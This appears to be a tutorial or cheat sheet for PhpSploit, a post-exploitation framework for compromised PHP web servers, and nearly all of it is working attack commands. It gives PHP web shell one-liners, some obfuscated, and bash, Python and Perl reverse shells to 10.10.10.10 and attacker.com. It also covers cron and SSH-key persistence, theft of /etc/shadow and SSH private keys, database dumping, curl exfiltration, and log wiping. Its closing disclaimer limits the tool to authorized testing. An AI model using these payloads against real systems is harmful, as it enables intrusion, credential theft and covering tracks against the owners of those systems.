PhpSploit
Overview
Sección titulada «Overview»PhpSploit is a remote administration framework designed for stealth post-exploitation activities on compromised PHP web servers. It operates through hidden PHP backdoors, allowing attackers to interact with compromised systems while evading detection. The framework provides command execution, file management, and system enumeration capabilities.
Key Features:
- Stealth PHP backdoor deployment
- Interactive remote shell environment
- File upload, download, and manipulation
- System enumeration and reconnaissance
- Memory-based operation (minimal disk footprint)
- Anti-detection capabilities
- Multi-session management
Installation
Sección titulada «Installation»From GitHub
Sección titulada «From GitHub»git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
chmod +x phpsploitRequirements
Sección titulada «Requirements»- Python 3.6+
- A web server with PHP execution capability
- Target web server accessible
Verify Installation
Sección titulada «Verify Installation»./phpsploit --version
./phpsploit --helpdocker run -it --rm phpsploitBasic Setup
Sección titulada «Basic Setup»Start PhpSploit Console
Sección titulada «Start PhpSploit Console»./phpsploitConnect to Existing Backdoor
Sección titulada «Connect to Existing Backdoor»phpsploit> connect http://target.com/shell.phpDeploy New Backdoor
Sección titulada «Deploy New Backdoor»phpsploit> upload shell.php http://target.com/upload/Interactive Shell
Sección titulada «Interactive Shell»phpsploit> shellCore Commands
Sección titulada «Core Commands»| Command | Description |
|---|---|
connect | Connect to backdoor URL |
upload | Deploy backdoor to server |
download | Download file from server |
shell | Interactive command shell |
run | Execute system command |
set | Configure framework settings |
exploit | Run exploitation modules |
sessions | Manage active sessions |
help | Display command help |
quit | Exit framework |
Connection Management
Sección titulada «Connection Management»Connect to Backdoor
Sección titulada «Connect to Backdoor»phpsploit> connect http://target.com/index.php
phpsploit> connect http://target.com:8080/shell.php
phpsploit> connect http://target.com/admin/upload/shell.phpConnection with Proxy
Sección titulada «Connection with Proxy»phpsploit> set proxy http://127.0.0.1:8080
phpsploit> connect http://target.com/shell.phpAuthentication
Sección titulada «Authentication»phpsploit> set user admin
phpsploit> set password secret123
phpsploit> connect http://target.com/shell.phpSession Management
Sección titulada «Session Management»phpsploit> sessions
phpsploit> sessions 1
phpsploit> sessions -k 1 # Kill sessionRemote Command Execution
Sección titulada «Remote Command Execution»Execute Single Command
Sección titulada «Execute Single Command»phpsploit> run id
phpsploit> run whoami
phpsploit> run pwd
phpsploit> run uname -aInteractive Shell Mode
Sección titulada «Interactive Shell Mode»phpsploit> shell
[shell]> id
[shell]> whoami
[shell]> ls -la
[shell]> exitExecute Shell Scripts
Sección titulada «Execute Shell Scripts»phpsploit> run bash -c "for i in {1..10}; do echo $i; done"
phpsploit> run sh -c "cat /etc/passwd"
phpsploit> run perl -e 'print "Hello\n"'Background Command Execution
Sección titulada «Background Command Execution»phpsploit> run nohup bash -i >& /dev/tcp/attacker.com/4444 0>&1 &File Operations
Sección titulada «File Operations»Upload Files
Sección titulada «Upload Files»phpsploit> upload /path/to/local/file.txt /var/www/html/
phpsploit> upload shell.php /var/www/html/uploads/
phpsploit> upload /path/to/payload.elf /tmp/Download Files
Sección titulada «Download Files»phpsploit> download /etc/passwd ./password_dump.txt
phpsploit> download /var/www/html/config.php ./config_backup.php
phpsploit> download /etc/shadow ./shadow_dumpList Remote Directory
Sección titulada «List Remote Directory»phpsploit> run ls -la /var/www/html/
phpsploit> run find /var/www/html -type f -name "*.php"
phpsploit> run du -sh /var/www/html/*Create/Modify Files
Sección titulada «Create/Modify Files»phpsploit> run echo "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
phpsploit> run cat > /tmp/malware.sh << EOF
# malware script here
EOFSystem Enumeration
Sección titulada «System Enumeration»Get System Information
Sección titulada «Get System Information»phpsploit> run uname -a
phpsploit> run cat /etc/os-release
phpsploit> run hostnamectl
phpsploit> run whoami
phpsploit> run idNetwork Information
Sección titulada «Network Information»phpsploit> run ip addr show
phpsploit> run ifconfig
phpsploit> run netstat -tulpn
phpsploit> run ss -tulpnProcess Enumeration
Sección titulada «Process Enumeration»phpsploit> run ps aux
phpsploit> run ps aux | grep -i apache
phpsploit> run ps aux | grep -i nginxUser and Privilege Information
Sección titulada «User and Privilege Information»phpsploit> run cat /etc/passwd
phpsploit> run sudo -l
phpsploit> run cat /etc/sudoersDisk and Storage Information
Sección titulada «Disk and Storage Information»phpsploit> run df -h
phpsploit> run mount
phpsploit> run lsblkBackdoor Deployment
Sección titulada «Backdoor Deployment»PHP Backdoor Creation
Sección titulada «PHP Backdoor Creation»# Simple one-liner backdoor
<?php system($_GET['cmd']); ?>
# More stealthy version
<?php if(isset($_POST['c'])){ echo "<pre>";system($_POST['c']);echo "</pre>"; } ?>
# Base64 encoded command execution
<?php system(base64_decode($_GET['x'])); ?>Deploy Backdoor via PhpSploit
Sección titulada «Deploy Backdoor via PhpSploit»phpsploit> upload backdoor.php /var/www/html/
phpsploit> connect http://target.com/backdoor.phpObfuscated Backdoor
Sección titulada «Obfuscated Backdoor»# Variable obfuscation
<?php $a="sy"."st"."em"; $a($_GET['c']); ?>
# Function indirection
<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>Persistent Backdoor
Sección titulada «Persistent Backdoor»# Write to web root with persistence
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/.hidden/shell.php
phpsploit> run chmod 644 /var/www/html/.hidden/shell.phpPost-Exploitation Workflows
Sección titulada «Post-Exploitation Workflows»Privilege Escalation Enumeration
Sección titulada «Privilege Escalation Enumeration»phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null
phpsploit> run find / -writable 2>/dev/null | head -20
phpsploit> run cat /etc/crontabCredential Harvesting
Sección titulada «Credential Harvesting»phpsploit> run cat /etc/shadow
phpsploit> run cat /home/*/.bash_history
phpsploit> run cat /root/.ssh/id_rsaLateral Movement
Sección titulada «Lateral Movement»# Enumerate internal network
phpsploit> run nmap -sn 192.168.1.0/24
phpsploit> run arp -a
# Scan for open ports
phpsploit> run netstat -tulpn | grep LISTENData Exfiltration
Sección titulada «Data Exfiltration»# Tar and compress sensitive files
phpsploit> run tar -czf /tmp/data.tar.gz /var/www/html/
# Encode for exfiltration
phpsploit> run base64 /tmp/data.tar.gz > /tmp/data.b64
# Download exfiltrated data
phpsploit> download /tmp/data.b64 ./exfiltrated_data.b64Advanced Configuration
Sección titulada «Advanced Configuration»Set User Agent
Sección titulada «Set User Agent»phpsploit> set user_agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phpsploit> set user_agent "Custom-Agent/1.0"Proxy Configuration
Sección titulada «Proxy Configuration»phpsploit> set proxy http://127.0.0.1:8080
phpsploit> set proxy socks5://127.0.0.1:9050Timeout Settings
Sección titulada «Timeout Settings»phpsploit> set timeout 30
phpsploit> set connect_timeout 10Request Headers
Sección titulada «Request Headers»phpsploit> set headers "Authorization: Bearer token123"
phpsploit> set headers "X-Custom-Header: value"Verbosity and Logging
Sección titulada «Verbosity and Logging»phpsploit> set verbosity 3
phpsploit> set logging on
phpsploit> set log_file ./phpsploit.logExploitation Techniques
Sección titulada «Exploitation Techniques»Reverse Shell Deployment
Sección titulada «Reverse Shell Deployment»# Bash reverse shell
phpsploit> run bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &
# Python reverse shell
phpsploit> run python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"
# Perl reverse shell
phpsploit> run perl -e "use Socket;$i='10.10.10.10';$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));connect(S,sockaddr_in($p,inet_aton($i)));exec('/bin/sh -i <&3 >&3 2>&3');"Cron Job Persistence
Sección titulada «Cron Job Persistence»phpsploit> run crontab -l
phpsploit> run (crontab -l; echo "* * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1") | crontab -SSH Key Injection
Sección titulada «SSH Key Injection»phpsploit> run mkdir -p /root/.ssh
phpsploit> run echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keysDatabase Access
Sección titulada «Database Access»phpsploit> run mysql -u root -ppassword -e "SHOW DATABASES;"
phpsploit> run mysql -u root -ppassword wordpress -e "SELECT user_login, user_pass FROM wp_users;"Defense Evasion
Sección titulada «Defense Evasion»Process Hiding
Sección titulada «Process Hiding»# Run command disassociated from parent
phpsploit> run nohup /path/to/command &
phpsploit> run setsid /path/to/commandTimestamp Manipulation
Sección titulada «Timestamp Manipulation»phpsploit> run touch -r /bin/ls /tmp/backdoor.php
phpsploit> run touch -t 202001010000 /tmp/backdoor.phpLog Sanitization
Sección titulada «Log Sanitization»phpsploit> run cat /var/log/apache2/access.log | grep -v "shell.php"
phpsploit> run > /var/log/apache2/access.log
phpsploit> run cat /dev/null > ~/.bash_historyFirewall Bypass
Sección titulada «Firewall Bypass»# DNS tunneling
phpsploit> run nslookup attacker.com
# HTTP tunneling
phpsploit> run curl http://attacker.com/callback?data=$(whoami)Scripting and Automation
Sección titulada «Scripting and Automation»Create PhpSploit Script
Sección titulada «Create PhpSploit Script»#!/bin/bash
# automated_exploitation.sh
TARGET="http://target.com/shell.php"
phpsploit <<EOF
connect $TARGET
set verbosity 2
run id
run whoami
run pwd
run uname -a
download /etc/passwd ./passwd.txt
quit
EOFBatch Command Execution
Sección titulada «Batch Command Execution»phpsploit> run 'for i in {1..10}; do echo $i; done'
phpsploit> run 'find / -name "*.conf" 2>/dev/null | head -20'
phpsploit> run 'grep -r "password" /var/www/html 2>/dev/null'Real-World Attack Scenarios
Sección titulada «Real-World Attack Scenarios»Web Server Compromise
Sección titulada «Web Server Compromise»# 1. Upload backdoor
phpsploit> upload backdoor.php /var/www/html/
# 2. Connect to backdoor
phpsploit> connect http://target.com/backdoor.php
# 3. Enumerate system
phpsploit> run uname -a
phpsploit> run id
# 4. Create persistence
phpsploit> run echo "<?php system($_GET['c']); ?>" > /var/www/html/.htaccess.phpDatabase Extraction
Sección titulada «Database Extraction»# Identify database
phpsploit> run find / -name "*.env" | grep -i database
# Extract credentials
phpsploit> run cat /var/www/html/.env | grep DATABASE
# Dump database
phpsploit> run mysqldump -u root -p database > /tmp/dump.sql
phpsploit> download /tmp/dump.sql ./database_dump.sqlApplication Server Escalation
Sección titulada «Application Server Escalation»# Identify running services
phpsploit> run ps aux | grep -i "apache\|nginx\|tomcat"
# Check for vulnerable services
phpsploit> run netstat -tulpn
# Attempt local privilege escalation
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/nullTroubleshooting
Sección titulada «Troubleshooting»Connection Issues
Sección titulada «Connection Issues»# Verify backdoor accessibility
curl http://target.com/shell.php
# Test with different encoding
phpsploit> set encoding base64
phpsploit> connect http://target.com/shell.phpCommand Execution Problems
Sección titulada «Command Execution Problems»# Test basic commands
phpsploit> run echo test
phpsploit> run id
# Check PHP version
phpsploit> run php --versionFile Transfer Issues
Sección titulada «File Transfer Issues»# Verify file permissions
phpsploit> run ls -la /var/www/html/
# Check available space
phpsploit> run df -h /var/www/html/Security Best Practices
Sección titulada «Security Best Practices»Operational Security
Sección titulada «Operational Security»- Use VPN/proxy for all connections
- Rotate backdoor locations regularly
- Clean logs and evidence of activity
- Use encrypted communication when possible
- Establish dead drops for communication
Detection Avoidance
Sección titulada «Detection Avoidance»- Use legitimate PHP functions
- Avoid suspicious filenames
- Minimize footprint on disk
- Use appropriate timing for activities
- Monitor system for detection indicators
Version and Support
Sección titulada «Version and Support»./phpsploit --versionLegal and Ethical Considerations
Sección titulada «Legal and Ethical Considerations»Critical: PhpSploit is designed for authorized penetration testing and red team exercises only. Unauthorized access to computer systems is illegal. Always obtain explicit written authorization before deploying backdoors or conducting post-exploitation activities. Misuse of this framework may result in serious legal consequences.